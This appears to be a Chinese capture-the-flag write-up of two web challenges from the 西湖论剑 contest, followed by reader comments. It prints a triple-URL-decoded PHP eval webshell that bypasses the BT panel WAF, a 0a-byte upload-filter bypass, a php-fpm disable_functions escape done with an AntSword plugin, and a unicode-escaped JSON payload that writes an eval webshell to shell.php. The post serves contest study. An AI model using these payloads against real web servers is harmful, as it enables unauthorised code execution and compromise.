西湖论剑线上赛 俩web

 

New Upload

文件上传

image-20201008134137211

测试以后发现除php后缀都能传上去。。

后来发现 0a污染就能传php了

image-20201008134249347

然后就是绕宝塔wafdisable_function

测试后发现宝塔waf不能解析三次url编码。。

<?php 
eval(urldecode(urldecode(urldecode($_POST['ha1c9on']))));

把payload编码三次就可以绕了

在phpinfo里发现需要绕disable_function

image-20201008134626589

发现有fpm

猜测fpm打。发现tmp目录下果然有php-cgi-74.sock

打开蚁剑 选择disable_function插件

注:可以将用burp代理蚁剑,urlencode后传参好像应该也行。

或者自己写一下蚁剑的编码器,呜呜呜

image-20201008134835259

./readflag

image-20201008134920555

easyjson

Post:

{“\u0063\u006f\u006e\u0074\u0065\u006e\u0074″:”\u003c\u003f\u0070\u0068\u0070\u0020\u0065\u0076\u0061\u006c\u0028\u0024\u005f\u0050\u004f\u0053\u0054\u005b\u0031\u005d\u0029\u003b\u003f\u003e”}

GET:

action=write&source=1&filename=shell.php

7 thoughts on “西湖论剑线上赛 俩web

  1. 夏天 Reply

    师傅能把蚁剑的具体链接贴出来吗,具体流程,我连上,上传成功,但是打不成功

    • Ha1c9on Post authorReply

      师傅可以把蚁剑给burp urlencode试一下 或者自己写一个编码器之类的 蚁剑就是最新版的 github有

  2. M Reply

    用蚁剑的插件把 打的fpm,为啥传上去之后还是 不能disabled_function 呀

  3. M Reply

    编码器写了,用蚁剑的插件把 so文件和ant.php文件都成功上传,但是去连那个ant.php的时候 连不上去。大师傅知道是什么情况吗

发表评论

电子邮件地址不会被公开。 必填项已用*标注